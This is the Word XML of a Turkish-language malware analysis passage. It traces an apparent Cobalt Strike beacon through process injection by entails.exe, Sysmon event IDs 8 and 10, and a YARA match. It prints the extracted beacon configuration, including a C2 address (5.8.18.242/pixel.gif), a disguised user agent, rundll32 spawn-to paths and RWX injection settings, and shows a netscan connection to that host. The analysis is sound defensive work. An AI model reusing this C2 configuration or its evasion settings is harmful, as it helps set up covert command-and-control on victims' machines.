      <w:r w:rsidRPr="12897420" w:rsidR="0805C38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</w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:left w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:bottom w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:right w:val="single" w:color="EBEBEB" w:sz="6"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1940"/>
        <w:gridCol w:w="721"/>
        <w:gridCol w:w="1378"/>
        <w:gridCol w:w="2136"/>
        <w:gridCol w:w="2221"/>
      </w:tblGrid>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="2FAD4548">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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7B419EA4" w14:textId="6F6DF4D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Process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 xml:space="preserve"> Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="721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459B1524" w14:textId="49BC77A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PID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1378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4AA195EC" w14:textId="286BB77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136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33B21A81" w14:textId="270F7E05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2221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1D8DC7A6" w14:textId="02ACB01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Description</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="7AEE0ADC">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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622A4CDC" w14:textId="7C9E96D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entails.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="721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56A39018" w14:textId="791F6041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4868</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1378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2F10C4F7" w14:textId="003886B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PE_INJECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2136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1CBCC355" w14:textId="0642147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0000000180000000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2221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20C992E0" w14:textId="31330FA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Module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:[loader_dll_64.dll]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="62C873DC" w:rsidP="12897420" w:rsidRDefault="62C873DC" w14:paraId="68E32DE9" w14:textId="275CE80B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2C873DC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</w:p>
    <w:p w:rsidR="5659B7F1" w:rsidP="12897420" w:rsidRDefault="5659B7F1" w14:paraId="0312FB13" w14:textId="467D33A7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5659B7F1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve">İkinci olarak kaçınma noktasında saldırgan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="5659B7F1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>entails.exe’yi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="5659B7F1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanarak </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="5659B7F1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>cmd.exeyi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="5659B7F1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> tam erişimle birlikte açıyor. </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="2263C75F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>Aslında kendi çalışt</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="0DDAAC42">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>ı</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="2263C75F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>racağı şeyleri cmd üzerinden çalıştırarak bir nevi kendini gizliyor</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="4D74292A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>. 0x1fffff</w:t>
      </w:r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>process_all_access</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> ile birlikte </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>CreateRemoteThread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> ile birlikte çalışıyor ve </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>Sysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>Event</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="1727E5AC">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID 8 tetikleniyor.</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="2263C75F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12897420" w:rsidR="2263C75F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>Bir</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="2263C75F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> işlem başka bir işlemi tetiklediği i</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="366D4336">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve">çin ise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</w:rPr>
        <w:t>Sysmon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</w:rPr>
        <w:t>Event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</w:rPr>
        <w:t xml:space="preserve"> ID 10 oluşuyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="366D4336" w:rsidP="12897420" w:rsidRDefault="366D4336" w14:paraId="253EF858" w14:textId="2C7B164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</w:pP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Event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id 8&gt; Bir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process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diğer bir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process'in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içinde bir “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thread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” oluşturduğu tespit edildiğinde meydana gelir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="52626D8D" w14:textId="5B75451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</w:pPr>
    </w:p>
    <w:p w:rsidR="366D4336" w:rsidP="12897420" w:rsidRDefault="366D4336" w14:paraId="36E8D276" w14:textId="6D008E80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Event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id 10&gt; Bir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process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başka bir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process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'i açtığı zaman tetiklenir. Bu operasyonu çoğunlukla bilgi sorgulama veya hedef </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>process'deki</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="366D43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tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> adres alanına okuma/yazma gibi işlemler takip eder.</w:t>
      </w:r>
      <w:r w:rsidR="5659B7F1">
        <w:drawing>
          <wp:inline wp14:editId="2626B79A" wp14:anchorId="3BD8A361">
            <wp:extent cx="5851524" cy="1268489"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1960697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b6f216a9a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4" cy="126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6B54F96D" w14:textId="245DADC3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7E451C00" w14:textId="4BB93A4B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7B0CF4A6" w:rsidP="12897420" w:rsidRDefault="7B0CF4A6" w14:paraId="707FC1D4" w14:textId="7BBFF20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7B0CF4A6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve">Son olarak ise </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="7B0CF4A6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>cmd.exe’nin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="7B0CF4A6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> işlemci hafızasını ortaya çıkarttığımızda</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="58F1BA7C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58F1BA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Malpedia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="7B0CF4A6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> YARA kurallarından </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="7B0CF4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win_cobalt_strike_auto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çalışıyor ve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beacon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saldırısı aşağıdaki gibi gözüküyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="70AF9967" w:rsidP="12897420" w:rsidRDefault="70AF9967" w14:paraId="77F67E9A" w14:textId="4AA37FD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BeaconType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windows-beacon_https-reverse_https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"Port": 443,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Sleeptime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60000,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Maxgetsize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1048576,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Jitter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MaxDns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PublicKey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": "30 81 9f 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 81 8d 00 30 81 89 02 81 81 00 a7 38 cd e7 5f 1f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1c 18 64 6c 37 7e 03 01 6b 16 2b 12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ba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72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f7 dc 36 b4 cd 2e 4e 9b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12 20 5a 95 c2 61 70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bf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90 81 05 ad 7f a4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cc fa 79 86 32 26 1b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98 70 f9 75 f2 07 94 e1 fe 49 95 23 d7 1f 08 a5 6c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03 15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bf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de 3d 6c 8a 16 38 6b 03 b7 a6 55 1a a1 33 6d 50 32 5a 35 00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27 d7 8a d8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13 b6 a7 3b 9f b7 c3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4d 7a 08 8e 32 3f 07 61 86 56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ec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d8 35 95 fa 5f 82 36 13 02 03 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00",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"c2_server": "5.8.18.</w:t>
      </w:r>
      <w:proofErr w:type="gram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242,/</w:t>
      </w:r>
      <w:proofErr w:type="gram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pixel.gif",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UserAgent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"Mozilla/4.0 (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compatible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; MSIE 7.0; Windows NT 5.1;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Trident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/4.0; .NET CLR 1.1.4322)",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PostURI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"/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submit.php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"Malleable_C2_Instructions2":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HttpGetHeader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Cookie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HttpPostHeader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": "\n\u0026Content-Type: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application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/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octet-streamid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SpawnTo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Pipename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KillDateYear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KillDateMonth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KillDateDay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DNSIdle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"0.0.0.0",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DNSSleep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"SSH_1":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"SSH_2":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"SSH_3":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"SSH_4":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"SSH_5":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GetVerb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"GET",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PostVerb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"POST",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HttpPostChunk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"SpawnTox86": "%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windir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%\\syswow64\\rundll32.exe",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"SpawnTox64": "%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windir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%\\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sysnative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\\rundll32.exe",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CryptoScheme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"Proxy":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ProxyUsername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ProxyPassword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ProxyType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": "IE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settings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Deprecated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LicenseId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305419776,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bStageCleanup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bCFGCaution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KillDate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TextSectionEnd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ObfuscateSectionsInfo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ProcessInjectStartRWX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"PAGE_EXECUTE_READWRITE",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ProcessInjectUseRWX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"PAGE_EXECUTE_READWRITE",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ProcessInjectMinAlloc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"ProcessInjectTransformx86":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"ProcessInjectTransformx64":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UsesCookies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1,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ProcessInjectExecute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ProcessInjectAllocationMethod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0,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ProcessInjectStub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": "b5 4a fe 01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ec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6a 75 ed f3 5e 1a 44 f8 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bd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39 29",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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HostHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="70AF99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": ""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="2A0FFFC6" w14:textId="2E8F1C1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6E582925" w:rsidP="12897420" w:rsidRDefault="6E582925" w14:paraId="5A69E8DC" w14:textId="0E1961F7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6E58292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"c2_server": "5.8.18.242/pixel.gif" yolundan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="6E58292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pixel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="6E58292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.gif ve </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="6E58292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cookiesleri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="6E58292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kullanarak aslında yapılan işlemin zararsı</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="54D0BCB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z</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="6E58292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gibi gözükmesini sağlıyor</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="676761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. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="67676119" w:rsidP="12897420" w:rsidRDefault="67676119" w14:paraId="1D04F1E2" w14:textId="212F5E9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676761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İletişim için 443 portundan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="676761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windows-beacon_https-reverse_https</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="676761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kullanarak </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="62FA3A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kurban makineden istek </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="62FA3A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atılarak</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="676761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şifreli</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="6767611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bir şek</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="01A735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ilde sağlanıyor. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="01A735CE" w:rsidP="12897420" w:rsidRDefault="01A735CE" w14:paraId="7F951160" w14:textId="2D75639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01A735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Sleeptime:60000</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="3B2607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seçerek kodun 60 saniyede bir çalışmasını sağlıyor. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3B2607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Jitter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3B2607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0 olduğu için belli bir aralıkla çalışmıyor. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B2607FC" w:rsidP="12897420" w:rsidRDefault="3B2607FC" w14:paraId="06AA5E88" w14:textId="0008C47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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3B2607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UserAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3B2607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kısmı ise</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="3FBCAA7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3FBCAA7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mozilla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3FBCAA7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seçerek yapılan iletişimi zararsız gibi gösteriyor.</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="7206B4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</w:p>
    <w:p w:rsidR="7206B426" w:rsidP="12897420" w:rsidRDefault="7206B426" w14:paraId="46404CE4" w14:textId="1D3FAAF9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7206B4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"\n\u0026Content-Type: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="7206B4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application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="7206B4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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="7206B4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octet-streamid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="7206B4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",</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="7206B4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Veri, "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="7206B4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octet-stream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="7206B4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" formatında gönderiliyor. Bu, ikili (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="7206B4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binary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="7206B4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) verilerin HTTP POST isteğiyle taşınacağını gösterir.</w:t>
      </w:r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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699CCBDA" w:rsidP="12897420" w:rsidRDefault="699CCBDA" w14:paraId="47D7C1E8" w14:textId="646B6EE1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Son olarak ise </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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spawnto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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kısmı </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="629E0F9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i</w:t>
      </w:r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burada ise çalıştır</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="67DBA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ı</w:t>
      </w:r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lacak zararlının rundll32.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="699CCBDA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de çalıştırılması isteniyor.</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="52FA8CE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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52FA8CE1" w:rsidP="12897420" w:rsidRDefault="52FA8CE1" w14:paraId="00FA31CF" w14:textId="5B947574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52FA8CE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PAGE_EXECUTE_READWRITE</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="52FA8CE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ile kötü amaçlı yazılım, kendi kodunu hedef bir sürece enjekte ederken okuma-yazma ve yürütme izinleri kullanıyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="19EE624B" w14:textId="24A50E25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tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:left w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:bottom w:val="single" w:color="EBEBEB" w:sz="6"/>
          <w:right w:val="single" w:color="EBEBEB" w:sz="6"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1467"/>
        <w:gridCol w:w="840"/>
        <w:gridCol w:w="1112"/>
        <w:gridCol w:w="881"/>
        <w:gridCol w:w="1113"/>
        <w:gridCol w:w="1062"/>
        <w:gridCol w:w="860"/>
        <w:gridCol w:w="840"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="2AEB84B8">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1467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5D7CEB98" w14:textId="5E43415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8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75352FB7" w14:textId="695290FA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Proto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1112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19C90470" w14:textId="2A0D8E9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LocalAddr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="881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6BD68AC6" w14:textId="43B85A65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LocalPort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1113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4B8E4319" w14:textId="7F7B306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ForeignAddr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1062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5E6E10D6" w14:textId="43A873B5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ForeignPort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="86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478A7142" w14:textId="2003BFE7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8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5FE64EC6" w14:textId="51F3E46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PID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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1EC8B355" w14:textId="07CFEE2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Owner</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="12897420" w:rsidTr="12897420" w14:paraId="553E0F0B">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1467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112A77E6" w14:textId="73104451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0xa30e2a5f34d0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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01875AFE" w14:textId="5430FBCA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TCPv4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1112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28A051B0" w14:textId="6CBD39F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REDACTED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="881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655F2566" w14:textId="62A7120B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60597</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1113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45174971" w14:textId="0ECA8CDA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5.8.18.242</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1062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1ABCC233" w14:textId="04EB23A0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443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="86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3D2012A7" w14:textId="3CC0FCC2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CLOSED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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2F3DBDF0" w14:textId="1505FA3A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11636</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="840" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:color="EBEBEB" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="3F9F1E5A" w14:textId="7B44BE5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424242"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>cmd.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="4FD7B024" w14:textId="1DD4587E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5F72A78B" w:rsidP="12897420" w:rsidRDefault="5F72A78B" w14:paraId="243D2BB5" w14:textId="29C82973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5F72A78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Burada 60597 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="5F72A78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local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="5F72A78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portundan diğer makinenin 443 portuna bağlantı oluyor. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="5F72A78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Localden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="5F72A78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60597 seçilme sebebi önemli ve göze ba</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="14F6364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tan bir port olmaması sebebiyle kullanılmış olabilir</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="68A57E5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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="5AFD7BB9" w14:textId="61E07D84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68A57E52" w:rsidP="12897420" w:rsidRDefault="68A57E52" w14:paraId="23056B7C" w14:textId="24BE9265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8A57E52">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>Entail.</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="68A57E52">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="68A57E52">
        <w:rPr>
